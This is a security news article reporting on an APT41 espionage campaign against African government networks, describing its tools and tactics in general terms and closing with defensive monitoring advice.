Who Is Behind the Attacks?
A well-known Chinese cyber espionage group, APT41, has launched a new campaign in Africa, targeting government IT infrastructure.
Researchers linked to the discovery said the hackers embedded hardcoded IPs, service names, and proxy paths into their malware. They even hijacked internal SharePoint servers as command-and-control (C2) hubs to issue commands.
While APT41 has attacked many sectors globally, including telecom, finance, healthcare, and education, this is one of their first major efforts focused on Africa. This shift suggests expanding geopolitical interests and growing technical capabilities.
How the Attack Began
The operation came to light when researchers spotted suspicious activity on a government IT network. They traced it back to a compromised, unmonitored host used by the attackers to run malicious commands.
Soon after gaining access, the group used Impacket, a popular attack framework, to escalate privileges. They leveraged WMI and Atexec modules to move laterally across systems.
Then, using DLL side-loading, they deployed Cobalt Strike, a red-team tool often abused by real-world threat actors.
How APT41 Avoids Detection
To stay hidden, the malware checks installed language packs. It does not execute if it detects languages like Chinese, Korean, or Japanese—a tactic often used to avoid hitting unintended targets.
Moreover, the attackers turned SharePoint servers into C2 platforms. They installed a malicious web shell called CommandHandler.aspx, which allowed them to send and receive commands from infected hosts.
Using SMB protocol, they spread C# malware disguised as agents.exe and agentx.exe. These files executed commands from the compromised SharePoint server, blending legitimate services with covert activity.
Living-off-the-Land and Reverse Shells
This campaign combined traditional malware with living-off-the-land techniques. Instead of relying only on external infrastructure, the attackers used existing internal services to control infected systems.
Additionally, they launched HTML Application (HTA) files using mshta.exe. These files, fetched from a fake GitHub domain, included JavaScript payloads designed to open reverse shells. This gave the attackers full access to execute further commands remotely.
Tools Used in the Attack
APT41 used both custom-built malware and publicly available tools during this operation. These tools helped gather data, steal credentials, and exfiltrate information.
Key tools included:
- Pillager (modified): Captured credentials, screenshots, SSH sessions, browser data, and system info
- Checkout: Stole downloaded files, saved credit card info, and browser activity
- RawCopy: Cloned raw registry files
- Mimikatz: Extracted login credentials
- Cobalt Strike: Managed post-exploitation activities
These tools were carefully tailored to blend in and exploit internal weaknesses.
Adaptive Techniques and Long-Term Presence
APT41 is known for its ability to adapt. In this campaign, the group customized its tools for the specific environment.
They monitored system configurations and adjusted malware behavior based on local infrastructure. By leveraging internal services like SharePoint and avoiding known security language zones, the group maintained stealth and persistence.
Their methods mirror real-world adversary simulations, making detection harder for traditional security teams. This overlap between testing tools and active threats creates serious risks.
How to Stay Protected
To guard against these advanced attacks, organizations should focus on early detection and response. Monitoring SharePoint activity, WMI behavior, and SMB traffic is critical.
Endpoint solutions that detect anomalous command execution, credential harvesting, and lateral movement can block malicious actions before they escalate.
Advanced cybersecurity platforms now offer behavior-based monitoring, automated threat isolation, and real-time forensic tools. These features help stop stealthy operations like APT41 before attackers gain full control.
Sleep well, we got you covered.
